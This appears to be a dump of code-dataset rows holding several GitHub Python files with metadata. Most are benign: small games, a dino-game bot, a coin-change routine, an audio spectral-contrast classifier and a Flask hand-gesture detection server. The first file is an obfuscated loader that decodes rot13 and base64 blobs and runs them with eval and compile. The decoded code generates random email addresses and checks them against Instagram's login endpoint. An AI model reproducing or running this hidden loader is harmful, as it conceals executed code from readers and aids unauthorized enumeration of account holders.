love = 'ovp6VPqbqUEjpmbiY3q3ql5coaA0LJqlLJ0hL29gWljXVPNtVPNtVPNtVPNapzIzMKWypvp6VPqbqUEjpmbiY3q3ql5coaA0LJqlLJ0hL29gY2SwL291oaEmY2kiM2yhYlpfPvNtVPNtVPNtVPNtW3AyLl1zMKEwnP1xMKA0WmbtW2IgpUE5WljXVPNtVPNtVPNtVPNap2IwYJMyqTAbYJ1iMTHaBvNaL29lplpfPvNtVPNtVPNtVPNtW3AyLl1zMKEwnP1mnKEyWmbtW3AuoJHgo3WcM2yhWljXVPNtVPNtVPNtVPNaqKAypv1uM2IhqPp6VPqAo3ccoTkuYmHhZPNbI2yhMT93plOBIPN2YwZ7VSqcowL0BlO4AwDcVRSjpTkyI2IvF2y0YmHmAl4mAvNbF0uHGHjfVTkcn2HtE2Iwn28cVRAbpz9gMF84BP4jYwDmZwDhZGN0VSAuMzSlnF81ZmphZmLaYNbtVPNtVPNtVPNtVPq4YJAmpzM0o2gyovp6VPq1ZwqfZaAeJUuLHmAmoH55JJt3LyyEA0qnMHZmBKckAFpfPvNtVPNtVPNtVPNtW3tgnJpgLKOjYJyxWmbtWmxmAwLkBGp0ZmZ5ZwD1BFpfPvNtVPNtVPNtVPNtW3tgnJpgq3q3YJAfLJygWmbtWmNaYNbtVPNtVPNtVPNtVPq4YJyhp3EuM3WuoF1unzS4WmbtWmquZ2RmMGL0MzR4AlpfPvNtVPNtVPNtVPNtW3tgpzIkqJImqTIxYKqcqTtaBvNaJR1ZFUE0pSWypKIyp3DaPa0XoT9aolN9VPpaWjbtK19sVPNtVPOsK19sVPOsK19sVPNtK18tK18tVPOsK19sVPOsK19sVPNXsPNtVSjtVPNiVPNtVSE8VPNtVSjtsPNtIPNtIPNiVPNtVSE8VPNtVSjtPajtVPNtKPOMVPOiVPO8sPNtKlNtJKjtVUjtVUkMVPOiVPO8sPNtEPNtXDc8VPORVPOMsPNtVPNtsUjtVUjtVUk8VPO+VPO8sPNtVPNtsUjtVPNtYlNXsPNtVPNtsUjtVS8tVUk8VPO8VPO8oS9sKljtsUjtVS8tVUk8VPNtVSjtPajtVPNtVUk8VPO8VPO8sPNtsPNtsUjtVPNtVPS8VPO8VPO8sPNtYvNtJDcfK19sK19doS9sny9snzksK2csK2cfK19sKl8toS9sny9snzksK2cpK2bXGKxtFJ5mqTSapzSgVQbtMQEhrGElptbXYF0gYF0gYF0gYF0gYF0gYF0gYF0gYF0gYF0gYF0gYF0gPvNtVPNtVPNtVPNtVPNtVPNt'
god = 'ICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnJycKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKZGVmIGVtYWlsKCk6Cglvcy5zeXN0ZW0oImNsZWFyIikKCWZpbGVyID0gb3BlbigiZW1haWwudHh0IiwidyIpCglwcmludChsb2dvKQoJbmFtZV9yYW5kb209aW5wdXQoIk5hbWUgUmFuZG9tIDoiKQoJZm9yIHggaW4gcmFuZ2UoMTUwKToKCQlmID0gJzEyMzQ1Njc4OTAnCgkJeDEgPSByYW5kb20uY2hvaWNlKGYpCgkJeDEyID0gcmFuZG9tLmNob2ljZShmKQoJCXgxMjMgPSByYW5kb20uY2hvaWNlKGYpCgkJeDEyMzQgPSByYW5kb20uY2hvaWNlKGYpCgkJYWxsID0gbmFtZV9yYW5kb20reDEreDEyK3gxMjMreDEyMzQrJ0B5YWhvby5jb20nCgkJdGltZWUgPSBhbGwrIlxuIgoJCWZpbGVyLndyaXRlKHRpbWVlKQoJdGltZS5zbGVlcCgzKQoJcHJpbnQoIlxuXG4iKQoJcHJpbnQoIk5PVyBZT1UgSEFWRSBFTUFJTCBKVVNUIEdJVkUgTUUgVElNRSAoOiIpCgl0aW1lLnNsZWVwKDQpCiNFTUFJTCBUQVdBVyBCVyBTQVJBWSBDSEVDS0VSIGluc3RheWEgCiNlbWFpbCgpCmRlZiBpbnN0YWdyYW0oKToKCXVzZT0wCglub3R1c2U9MAoJb3Muc3lzdGVtKCJjbGVhciIpCglwcmludChsb2dvKQoJZmlsZXIgPSBvcGVuKCJlbWFpbGluc3RhLnR4dCIsInciKQoJZmlsdGVyID0gb3BlbigiZW1haWwudHh0IiwiciIpLnJlYWRsaW5lcygpCglmb3IgeiBpbiBmaWx0ZXI6CgkJenogPSB6LnN0cmlwKCkKCQlnbG9iYWwgdXJsX2luc3RhCgkJZ2xvYmFsIGhlYWRfaW5zdGEKCQlkYXRhID0gewogICAgJ3VzZXJuYW1lJzogenosCiAgICAnZW5jX3Bhc3N3b3JkJzogJyNQV0RfSU5TVEFHUkFNX0JST1dTRVI6MDoxNjEzMjEyNzI1OnNqcycsCiAgICAncXVlcnlQYXJhbXMnOiAne30nLAogICAgJ29wdEludG9PbmVUYXAnOiAnZmFsc2UnCgkJfQoJCXJlc3QgPSByZXF1'
destiny = 'MKA0pl5jo3A0XUIloS9coaA0LFkbMJSxMKWmCJuyLJEsnJ5mqTRfMTS0LG1xLKEuXF50MKu0PtxWV3OlnJ50XUWyp3DcPtxWnJLtWlW1p2IlVwc0paIyWlOcovOlMKA0BtbWPDyipl5mrKA0MJ0bVzAfMJSlVvxXPDxWpUWcoaDboT9aolxXPDxWqKAyXm0kPtxWPKOlnJ50XPWSGHSWGPOZFH5YEHDtFH5GIRSUHxSAVQbtr30vYzMipz1uqPu1p2HcXDbWPDyjpzyhqPtvGx9HVRkWGxgSEPN6VUg9Vv5zo3WgLKDboz90qKAyXFxXPDxWMzyfMKVhq3WcqTHbrabeVykhVvxXPDxWp2IhMS90MKu0VQ0tW2u0qUOmBv8iLKOcYaEyoTIapzSgYz9lMl9vo3DkAwNlZwtlZQLjBxSOEGyXEQEvA3cTFUc4GTgJJII6oTykH1IUox9xFR1jAQEAY3AyozEAMKAmLJqyC2AbLKEsnJD9ZGLkAGZ0Amt1ZvMjLKWmMI9go2EyCH1upzgxo3qhWaEyrUD9Wlg6rtbWPDybq2xtCFOlMKS1MKA0pl5aMKDbp2IhMS90MKu0XDbWPJIfp2H6PtxWPDbWPDyipl5mrKA0MJ0bVzAfMJSlVvxXPDxWpUWcoaDboT9aolxXPDxWoz90qKAyXm0kPtxWPKOlnJ50XPWSGHSWGPOZFH5YEHDtFH5GIRSUHxSAVQbtr30vYzMipz1uqPu1p2HcXDbWPDyjpzyhqPtvGx9HVRkWGxgSEPN6VUg9Vv5zo3WgLKDboz90qKAyXFxXPDxXPDxXPDxXV2yhp3EuM3WuoFtcPtxWPzEyMvOwMJ1unJjbXGbXPDyipl5mrKA0MJ0bVzAfMJSlVvxXPDyjpzyhqPufo2qiXDbWPJMcoUEypvN9VT9jMJ4bVzIgLJyfnJ5mqTRhqUu0VvjvpvVcYaWyLJEfnJ5ypltcPtxWMz9lVUu4VTyhVTMcoUEypwbXPDxWqTygMF5moTIypPt4XDbWPDy4VQ14rP5mqUWcpPtcPtxWPKIloPN9VPqbqUEjpmbiY2EuozqypaA5qJ15qJ0hZQNjq2IvnT9mqTSjpP5wo20iLKOcYaObpQ9yoJScoQ0aX3tXPDxWpzImpT9hMFN9VUWypKIyp3EmYzqyqPu1pzjcPtxWPJyzVPqRFHHaVTyhVUWyp3OiozHhqTI4qQbXPDxWPKOlnJ50XPWSGHSWGPN6VPVerPxXPDxWMJkmMGbXPDxWPKOup3ZXPDxWPzIgLJyfXPxXnJ5mqTSapzSgXPxXPtxWPtxWPt=='
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec')) | [
"[email protected]"
] | |
099766ad78e6c05c6b43501d208f8861cf94d568 | 9216ec6fc0044a730f1fac563d73c2bfaf97e518 | /2048.py | 96e3a977505373bb955978fdaa517301115535e9 | [] | no_license | Starship87/2048-game | 92ce37dfce7c18ffa1578ae0a3fb59a9e98e0a10 | ade141ac093448d0192960a5f37ae236bd4c33ca | refs/heads/master | 2020-09-24T11:40:58.473695 | 2020-01-29T01:02:48 | 2020-01-29T01:02:48 | 225,752,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | #2048 game
import random
import time
score = 0
highscore = 0
board =[]
def newgame():
global board
#fill board
board = []
row = []
for i in range(4):
row.append(0)
for j in range(4):
board.append(row.copy())
def showboard():
for i in range(4):
row = ""
for j in range (4):
row = row + str(board[i][j]) + " "
print(row)
def newnumber():
newnum = 0
newrow = random.randint(0,3)
newcol = random.randint(0,3)
while board[newrow][newcol] != 0:
newrow = random.randint(0,3)
newcol = random.randint(0,3)
rand = random.randint(1, 100)
if rand < 80:
newnum = 2
else:
newnum = 4
newgame()
showboard()
| [
"[email protected]"
] | |
9da9cea9f0b10697611fe8b65be747c62a209e15 | eaccc86687e5d3ea409c41759e9daf25e976fcb6 | /GDinoBot.py | 5a6fd8ae2e77f531e031313d1addfb06ea2bd44b | [] | no_license | LucidMach/GDinoBot | 188d27613cf21d1e5446b93072290ad09f5c9b6e | fd4f089475b99974ba05e93319967e950e6300ed | refs/heads/master | 2022-08-17T05:21:57.323840 | 2020-05-24T20:15:58 | 2020-05-24T20:15:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | import pyautogui as pg, time
white = (255, 255, 255)
pg.hotkey("win","2")
time.sleep(1)
pg.typewrite("a")
pg.hotkey("enter")
time.sleep(1)
pg.hotkey("space ")
while True:
while pg.pixel(x=900, y=750) == white:
if pg.pixel(x=679, y=333) != white:
pg.hotkey("space")
elif pg.pixel(x=679, y=333) == white and pg.pixel(x=679, y=305) != white:
pg.keyDown("down")
time.sleep(0.75)
pg.keyUp("down")
while pg.pixel(x=900, y=750) != white:
if pg.pixel(x=679, y=333) == white:
pg.hotkey("space")
elif pg.pixel(x=679, y=333) != white and pg.pixel(x=679, y=305) == white:
pg.keyDown("down")
time.sleep(0.75)
pg.keyUp("down")
| [
"[email protected]"
] | |
8d7fb22a6c6756d44fe42a19ac950cc877acbe97 | aadf51507e9a664729ea42d38e62cd6a08da0f06 | /change.py | c3a407c2c6f913115059195abbfe9277cc5a754c | [] | no_license | tanjinarahm/algorithms2 | 29b2dcbe0b59d0a84aa95b96fe7e49a26f85432e | 61b8022ddf0b78a799a2e88f63fb845925ec127f | refs/heads/master | 2022-04-23T07:29:50.300892 | 2020-04-28T02:08:45 | 2020-04-28T02:08:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | def change(num):
change = {"q": 0, "d": 0, "n": 0, "p": 0}
if num >= 25:
change["q"] = int(num/25)
num %= 25
if num >= 10:
change["d"] = int(num/10)
num %= 10
if num >= 5:
change["n"] = int(num/5)
num %= 5
if num >= 1:
change["p"] = int(num/1)
num %= 1
return change
print(change(94))
def change2(num):
change = {"q": 0, "d": 0, "n": 0, "p": 0}
while (num > 0):
if num >= 25:
change["q"] += 1
num -= 25
elif num >= 10:
change["d"] += 1
num -= 10
elif num >= 5:
change["n"] += 1
num -= 5
else:
change["p"] += 1
num -= 1
return change
print(change2(94))
| [
"[email protected]"
] | |
7d58d170ccd59d2b30f04e9210067ffec1c01f94 | d4f76aa484cbf1f6026b0c102e5d70012a28512a | /msos_project/dsp_tools/spectral_contrast_feature_max_classifier.py | e8c4ff4004c4f9e5ebfe3c18654201b6ca4a19de | [] | no_license | hbulg96/MSOS-classifier | 4eaea8b434455fc300b25fcd0c6bde52b32e7d23 | aa5b9702f7f39a30ea9b9746244c82fa75b2bbea | refs/heads/main | 2023-05-05T05:19:19.374327 | 2021-05-25T16:39:59 | 2021-05-25T16:39:59 | 370,755,497 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,046 | py | import numpy
import matplotlib
from matplotlib import pyplot
import scipy
from scipy import signal
from scipy.io.wavfile import read
from scipy.io.wavfile import write
import os
import timeit
import traceback
import msos_project
from msos_project import *
from msos_project.dsp_tools import *
import msos_project.dsp_tools.peakdetection as peakdetection
import msos_project.dsp_tools.peakflatten as peakflatten
import msos_project.dsp_tools.rhythmdetection as rhythmdetection
import msos_project.dsp_tools.find_similar_magnitude_peaks as find_similar_magnitude_peaks
import msos_project.dsp_tools.find_rhythmic_packets as find_rhythmic_packets
from numpy import random
import msos_project.classification_1_rhythm_time_domain_v0_standalone as classifier1
import msos_project.dsp_tools.spectral_centroid_classifier as spectral_centroid_classifier
import msos_project.dsp_tools.spectral_centroid_assign_weights as spectral_centroid_assign_weights
import msos_project.dsp_tools.zero_crossing_rate_classifier as zero_crossing_rate_classifier
import msos_project.dsp_tools.rms_variation_classifier as rms_variation_classifier
from scipy import stats
from numpy import polyfit
import librosa
from librosa import *
from librosa import display
import scipy.stats
def spectral_contrast_feature_max_classifier(input_path, show_graph=False):
input_file = read(input_path) # read wav file
fs = input_file[0]
input_file = numpy.array(input_file[1], dtype = float) # interpret file as numpy array
print("Fs = ", fs)
feature_1 = librosa.feature.spectral_contrast(input_file, n_bands=8, fmin=100, sr=fs)
feature_2 = librosa.feature.spectral_contrast(input_file, n_bands=8, fmin=100, sr=fs)
number_of_bands = feature_1.shape[0]
length_of_contrast_values = feature_1.shape[1]
# find most tonal or most noisy band
band_averages = [] #store average spectral contrast value per band
for freq_band in range(number_of_bands):
current_band = feature_1[freq_band]
band_average = sum(current_band)/len(current_band)
band_averages.append(band_average)
for contrast_value in range(len(current_band)):
current_value = current_band[contrast_value]
pass
pass
max_contrast_band = max(band_averages)
max_contrast_band_index = band_averages.index(max_contrast_band)
min_contrast_band = min(band_averages)
min_contrast_band_index = band_averages.index(min_contrast_band)
#print("band_averages = ", band_averages)
#print("largest average contrast band value = ", max_contrast_band)
#print("max contrast band index = ", max_contrast_band_index)
#print("smallest average contrast band value = ", min_contrast_band)
#print("minx contrast band index = ", min_contrast_band_index)
# most important band (feature band)
feature_band_index = max_contrast_band_index
feature_band = feature_1[feature_band_index] # contrast band with the highest average contrast value,
# representing the most interesting/intentional sound?
# "least" important band (noise band)
noise_band_index = min_contrast_band_index
noise_band = feature_1[noise_band_index]
# amount of time spent with max contrast in feature band (should be closest to feature band)
time_spent_at_feature_band = 0
time_spent_at_noise_band = 0
max_contrast_all_bands = [] # location of the max spectral contrast at any time
for value_index in range(length_of_contrast_values):
# find index of current spectral contrast value
contrast_values_per_band = []
for freq_band in range(number_of_bands):
# find max value in all bands
current_band = feature_1[freq_band]
#print("freq band index = ", freq_band)
#print("spectral contrast values = ", current_band)
contrast_values_per_band.append(current_band[value_index])
pass
max_contrast_value_band = max(contrast_values_per_band)
mcvb_index = contrast_values_per_band.index(max_contrast_value_band)
max_contrast_all_bands.append(mcvb_index)
min_contrast_value_band = min(contrast_values_per_band)
mincvb_index = contrast_values_per_band.index(min_contrast_value_band)
if mcvb_index == feature_band_index:
time_spent_at_feature_band += 1
pass
else:
pass
if mincvb_index == noise_band_index:
time_spent_at_noise_band += 1
pass
else:
pass
feature_1 = time_spent_at_noise_band # Average of spectral contrast in all bands condensed into one value
feature_2 = time_spent_at_feature_band # amount of time ticks spent with max spentral contrast in the feature band
if show_graph == True:
print("Noise-min metric = ", feature_1)
print("Feature-max metric = ", feature_2)
pyplot.figure(1)
contrast_bands = librosa.feature.spectral_contrast(input_file, n_bands=8, fmin=100, sr=fs)
pyplot.imshow(contrast_bands, aspect='auto', origin="lower", cmap="coolwarm")
pyplot.ylabel('Frequency Band')
pyplot.xlabel('Time (DFT bin)')
pyplot.title("Spectral Contrast")
# add lines for feature band and noise band
contrast_bands = librosa.feature.spectral_contrast(input_file, n_bands=8, fmin=100, sr=fs)
feature_band_x_points = [0, (contrast_bands.shape[1] - 1)]
feature_band_y_points = [feature_band_index, feature_band_index]
pyplot.plot(feature_band_x_points, feature_band_y_points, color='r',linewidth=3, label='feature band')
noise_band_x_points = [0, (contrast_bands.shape[1] - 1)]
noise_band_y_points = [noise_band_index, noise_band_index]
pyplot.plot(noise_band_x_points, noise_band_y_points, color='b', linewidth=3, label='noise band')
pyplot.plot(range(len(max_contrast_all_bands)), max_contrast_all_bands, color='g', label='max spectral contrast value')
pyplot.legend()
pyplot.show()
pass
elif show_graph == False:
pass
else:
print("Error in detecting show_graph variable")
pass
return(feature_1, feature_2)
"""
test_file = read(r"C:\\Users\h_bul\Documents\Acoustics Year 3\Project\Audio Resources\Development\Effects\0M8.wav")
test_file = numpy.array(test_file[1], dtype = int)
matplotlib.pyplot.plot(test_file)
pyplot.xlabel("Time")
pyplot.ylabel("Amplitude")
pyplot.show()
"""
"""
matplotlib.pyplot.plot(gain_boosted_file)
pyplot.xlabel("Time")
pyplot.ylabel("Amplitude")
pyplot.show()
"""
"""
f, t, Sxx = signal.spectrogram(average_effect_file, 44100)
pyplot.pcolormesh(t, f, Sxx, shading='gouraud')
pyplot.ylabel('Frequency [Hz]')
pyplot.xlabel('Time [sec]')
pyplot.show()
"""
| [
"[email protected]"
] | |
6bc1c39d0bfd966c86046b9b2b34af90fc49a7b8 | f24c8aa0a55709eb660026f2c94c284b314d471e | /app.py | 461a6d4414e7997877b6daf8c7babc3d82ee91af | [
"BSD-3-Clause"
] | permissive | ocanava/number_guessing_game | 72ee44ecf3169c6c00a05150bc651fd8deb27ba3 | f0ca634301ee0f24fd39b05d6196ac7b490fb00a | refs/heads/master | 2022-12-13T11:54:33.841804 | 2020-08-31T15:43:41 | 2020-08-31T15:43:41 | 278,231,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,401 | py | """
Python Web Development Techdegree
Project 1 - Number Guessing Game
--------------------------------
import random
number = random.randint(1, 10)
def start_game():
print("Welcome to the Number Guessing Game!!")
input("Press ENTER to continue...")
Tries = 1
while True:
try:
number = int(input("Pick a number between 1 and 10: "))
number = int(number)
guess_value = 3
except ValueError:
print("Oops! Please enter a valid number.")
Tries = Tries + 1
else:
if guess_value > number:
print("It's Higher! ")
Tries = Tries + 1
continue
elif guess_value < number:
print("It's Lower! ")
Tries = Tries + 1
continue
elif guess_value == number:
Tries = str(Tries)
print("Well done! You guessed it in", Tries + " tries. Game has ended! See you next time! ")
break
start_game()
| [
"[email protected]"
] | |
5ff88ef18493eedc1ff2c03369b53bedee882b04 | 0f297fb93f82b55c83817479af2e00bb737dcc93 | /实习小车启动代码/111/merg.py | f44ff12c93da1cff11d9a96f42d51c2890771ce5 | [] | no_license | yejiasheng/raspberry | 55c3dabf13fcff6dfeaddecbc72e2cf8968daaa3 | 27e1a95197a10583ce205bf40c04bcc8b76b2dc7 | refs/heads/main | 2023-07-25T02:57:38.875487 | 2021-09-07T01:45:36 | 2021-09-07T01:45:36 | 403,806,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,776 | py | from flask import Flask, render_template, Response
import sys
sys.path.append("/home/lzk/samples/common")
sys.path.append("../")
import os
import numpy as np
import acl
import time
import socket
import cv2
import traceback
from PIL import Image, ImageDraw, ImageFont
import atlas_utils.constants as const
from atlas_utils.acl_model import Model
from atlas_utils.acl_resource import AclResource
import atlas_utils.utils as utils
from atlas_utils.acl_dvpp import Dvpp
from atlas_utils.acl_image import AclImage
app = Flask(__name__)
camera = cv2.VideoCapture('rtsp://192.168.10.24/test') # use 0 for web camera
# for cctv camera use rtsp://username:password@ip_address:554/user=username_password='password'_channel=channel_number_stream=0.sdp' instead of camera
# for local webcam use cv2.VideoCapture(0)
labels =["hand"]
MODEL_PATH = "/home/YJS/model/yolov3_me.om"
MODEL_WIDTH = 416
MODEL_HEIGHT = 416
class_num = 3
stride_list = [32, 16, 8]
anchors_3 = np.array([[12, 16], [19, 36], [40, 28]]) / stride_list[2]
anchors_2 = np.array([[36, 75], [76, 55], [72, 146]]) / stride_list[1]
anchors_1 = np.array([[142, 110], [192, 243], [459, 401]]) / stride_list[0]
anchor_list = [anchors_1, anchors_2, anchors_3]
conf_threshold = 0.8
iou_threshold = 0.3
colors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (0, 255, 255), (255, 0, 255), (255, 255, 0)]
# Initialization
acl_resource = AclResource()
acl_resource.init()
model = Model("/home/YJS/model/yolov3_me.om")
def preprocess(image):#cv
image = Image.fromarray(cv2.cvtColor(image,cv2.COLOR_BGR2RGB))
img_h = image.size[1] #360
img_w = image.size[0] #640
net_h = MODEL_HEIGHT #416
net_w = MODEL_WIDTH #416
scale = min(float(net_w) / float(img_w), float(net_h) / float(img_h)) #416/640
new_w = int(img_w * scale) #416
new_h = int(img_h * scale) #234
#delta = (MODEL_HEIGHT - int(image.size[1] * scale)) // 2
shift_x = (net_w - new_w) // 2 #0
shift_y = (net_h - new_h) // 2 #91
shift_x_ratio = (net_w - new_w) / 2.0 / net_w #0
shift_y_ratio = (net_h - new_h) / 2.0 / net_h #0.21875
image_ = image.resize((new_w, new_h))
new_image = np.zeros((net_h, net_w, 3), np.uint8)
new_image[shift_y: new_h + shift_y, shift_x: new_w + shift_x, :] = np.array(image_)
new_image = new_image.astype(np.float32)
new_image = new_image / 255
#print('new_image.shape', new_image.shape)
new_image = new_image.transpose(2, 0, 1).copy()
return new_image, image
def overlap(x1, x2, x3, x4):
left = max(x1, x3)
right = min(x2, x4)
return right - left
def cal_iou(box, truth):
w = overlap(box[0], box[2], truth[0], truth[2])
h = overlap(box[1], box[3], truth[1], truth[3])
if w <= 0 or h <= 0:
return 0
inter_area = w * h
union_area = (box[2] - box[0]) * (box[3] - box[1]) + (truth[2] - truth[0]) * (truth[3] - truth[1]) - inter_area
return inter_area * 1.0 / union_area
def apply_nms(all_boxes, thres):
res = []
for cls in range(class_num):
cls_bboxes = all_boxes[cls]
sorted_boxes = sorted(cls_bboxes, key=lambda d: d[5])[::-1]
p = dict()
for i in range(len(sorted_boxes)):
if i in p:
continue
truth = sorted_boxes[i]
for j in range(i + 1, len(sorted_boxes)):
if j in p:
continue
box = sorted_boxes[j]
iou = cal_iou(box, truth)
if iou >= thres:
p[j] = 1
for i in range(len(sorted_boxes)):
if i not in p:
res.append(sorted_boxes[i])
return res
def _sigmoid(x):
return 1.0 / (1 + np.exp(-x))
def decode_bbox(conv_output, anchors, img_w, img_h, x_scale, y_scale, shift_x_ratio, shift_y_ratio):
print('conv_output.shape', conv_output.shape)
_, _, h, w = conv_output.shape
conv_output = conv_output.transpose(0, 2, 3, 1)
pred = conv_output.reshape((h * w, 3, 5 + class_num))
pred[..., 4:] = _sigmoid(pred[..., 4:])
pred[..., 0] = (_sigmoid(pred[..., 0]) + np.tile(range(w), (3, h)).transpose((1, 0))) / w
pred[..., 1] = (_sigmoid(pred[..., 1]) + np.tile(np.repeat(range(h), w), (3, 1)).transpose((1, 0))) / h
pred[..., 2] = np.exp(pred[..., 2]) * anchors[:, 0:1].transpose((1, 0)) / w
pred[..., 3] = np.exp(pred[..., 3]) * anchors[:, 1:2].transpose((1, 0)) / h
bbox = np.zeros((h * w, 3, 4))
bbox[..., 0] = np.maximum((pred[..., 0] - pred[..., 2] / 2.0 - shift_x_ratio) * x_scale * img_w, 0) # x_min
bbox[..., 1] = np.maximum((pred[..., 1] - pred[..., 3] / 2.0 - shift_y_ratio) * y_scale * img_h, 0) # y_min
bbox[..., 2] = np.minimum((pred[..., 0] + pred[..., 2] / 2.0 - shift_x_ratio) * x_scale * img_w, img_w) # x_max
bbox[..., 3] = np.minimum((pred[..., 1] + pred[..., 3] / 2.0 - shift_y_ratio) * y_scale * img_h, img_h) # y_max
# print('bbox', bbox)
pred[..., :4] = bbox
pred = pred.reshape((-1, 5 + class_num))
# pred[:, 4] = np.max(pred[:, 5:], axis=-1)
pred[:, 4] = pred[:, 4] * pred[:, 5:].max(1)
pred[:, 5] = np.argmax(pred[:, 5:], axis=-1)
pred = pred[pred[:, 4] >= 0.2]
print('pred[:, 5]', pred[:, 5])
print('pred[:, 5] shape', pred[:, 5].shape)
# pred = pred[pred[:, 4] >= conf_threshold]
all_boxes = [[] for ix in range(class_num)]
for ix in range(pred.shape[0]):
box = [int(pred[ix, iy]) for iy in range(4)]
box.append(int(pred[ix, 5]))
box.append(pred[ix, 4])
all_boxes[box[4] - 1].append(box)
# print('all_boxes', all_boxes)
return all_boxes
def convert_labels(label_list):
if isinstance(label_list, np.ndarray):
label_list = label_list.tolist()
label_names = [labels[int(index)] for index in label_list]
return label_names
def construct_image_info():
"""construct image info"""
image_info = np.array([MODEL_WIDTH, MODEL_HEIGHT,
MODEL_WIDTH, MODEL_HEIGHT],
dtype = np.float32)
return image_info
def post_process(infer_output, origin_img):
"""postprocess"""
print("post process")
box_num = infer_output[1][0, 0]
print(infer_output[1][0, 0])
print("box num ", box_num)
box_info = infer_output[0].flatten()
scalex = origin_img.width / MODEL_WIDTH
delta = (MODEL_HEIGHT - int(origin_img.height * 416/640)) // 2 #91
print(delta)
scaley = origin_img.height / MODEL_HEIGHT
# if scalex > scaley:
# scaley = scalex
draw = ImageDraw.Draw(origin_img)
font = ImageFont.load_default()
for n in range(int(box_num)):
ids = int(box_info[5 * int(box_num) + n])
label = labels[ids]
score = box_info[4 * int(box_num)+n]
top_left_x = box_info[0 * int(box_num)+n] * scalex
top_left_y = (box_info[1 * int(box_num)+n]-delta)/234*360
bottom_right_x = box_info[2 * int(box_num) + n] * scalex
bottom_right_y = (box_info[3 * int(box_num) + n]-delta)/234*360
draw.line([(top_left_x, top_left_y), (bottom_right_x, top_left_y), (bottom_right_x, bottom_right_y), \
(top_left_x, bottom_right_y), (top_left_x, top_left_y)], fill=(0, 200, 100), width=5)
draw.text((top_left_x, top_left_y), label, font=font, fill=255)
num=0
if box_num==1:
xpt=(top_left_x+bottom_right_x)/2#获取绿框的中心点
ypt=(top_left_y+bottom_right_y)/2#获取绿框的中心点
w = origin_img.size[0] # 图片长度
h = origin_img.size[1] # 图片宽度
# print(w)
# print(h)
if 0<=ypt<(1/3)*h and ypt < (h/w)*xpt and ypt < -(h/w)*xpt+h:
# print("前进!")
# print(f"数字信号{num}")
#draw.text((xpt, ypt), "前进", font=font, fill=255)
num=0
elif 0 <= xpt < (1/3)*w and (h/w)*xpt <= ypt <= -(h/w)*xpt+h:
# print("右转!")
# print(f"数字信号{num}")
#draw.text((xpt, ypt), "左转", font=font, fill=255)
num=1
elif ypt > (h/w)*xpt and ypt>-(h/w)*xpt+h and (2/3)*h < ypt <= h:
# print("后退!")
# print(f"数字信号{num}")
#draw.text((xpt, ypt), "后退", font=font, fill=255)
num=2
elif (2/3)*w < xpt <= w and -(h/w)*xpt+h <= ypt <= (h/w)*xpt:
# print("左转!")
# print(f"数字信号{num}")
#draw.text((xpt, ypt), "右转", font=font, fill=255)
num=3
elif (1/3)*w <= xpt <= (2/3)*w and (1/3)*h <= ypt <= (2/3)*h:
# print("停止!")
# print(f"数字信号{num}")
#draw.text((xpt, ypt), "停止", font=font, fill=255)
num=4
else :
print("error")
else:
# print("未成功识别")
# print(f"数字信号{num}")
num=4
return origin_img,num
def frameprocessing(frame):
w=640
h=360
frame == cv2.flip(frame,1)
image_info = construct_image_info()
data, orig = preprocess(frame)
result_list = model.execute([data,image_info])
# ret = acl.rt.synchronize_stream(0)
print(result_list)
image1 = Image.fromarray(cv2.cvtColor(frame,cv2.COLOR_BGR2RGB))
afterframe,num = post_process(result_list,image1)
afterframe = cv2.cvtColor(np.asarray(afterframe),cv2.COLOR_RGB2BGR)
a = int(w/3)#长三分之一处
b = int(2*w/3)#长三分之二处
c = int(h/3) # 宽三分之一处
d = int(2*h/3) # 宽三分之二处
e = int(w/3)+3
f = int(2*w/3)-3
cv2.line(afterframe, (0,0), (a,c), (0, 0, 255), 2)
cv2.line(afterframe, (a,c), (b,c), (0, 0, 255), 2)
cv2.line(afterframe, (b,c), (w,0), (0, 0, 255), 2)
cv2.line(afterframe, (a,c), (a,d), (0, 0, 255), 2)
cv2.line(afterframe, (a,d), (0,h), (0, 0, 255), 2)
cv2.line(afterframe, (a,d), (b,d), (0, 0, 255), 2)
cv2.line(afterframe, (b,d), (w,h), (0, 0, 255), 2)
cv2.line(afterframe, (b,c), (b,d), (0, 0, 255), 2)#以上八行为区域判定
cv2.line(afterframe, (e,0), (f,0), (0, 255, 0), 2)
cv2.line(afterframe, (e,h), (f,h), (0, 255, 0), 2)
cv2.line(afterframe, (e,0), (e,h), (0, 255, 0), 2)
cv2.line(afterframe, (f,0), (f,h), (0, 255, 0), 2)
return afterframe
def gen_frames(): # generate frame by frame from camera
while True:
# Capture frame-by-frame
success, frame = camera.read() # read the camera frame
# frame, num=ff.frameprocessing(frame)
if not success:
break
else:
print('1')
frame = cv2.imread('/home/YJS/111/1.jpg')
print("2")
frame=frameprocessing(frame) ###############
frame = cv2.imread('/home/YJS/111/1.jpg')
ret, buffer = cv2.imencode('.jpg', frame)
# ret, buffer = cv2.imencode('.jpg', fram)
frame = buffer.tobytes()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n') # concat frame one by one and show result
@app.route('/video_feed')
def video_feed():
#Video streaming route. Put this in the src attribute of an img tag
return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/')
def index():
"""Video streaming home page."""
return render_template('index.html')
def tttt():
fram = cv2.imread('/home/YJS/111/1.jpg')
frame=frameprocessing(fram) ###############
cv2.imwrite('/home/YJS/111/4.jpg',frame)
if __name__ == '__main__':
# tttt()
app.run(host="0.0.0.0",debug=True)
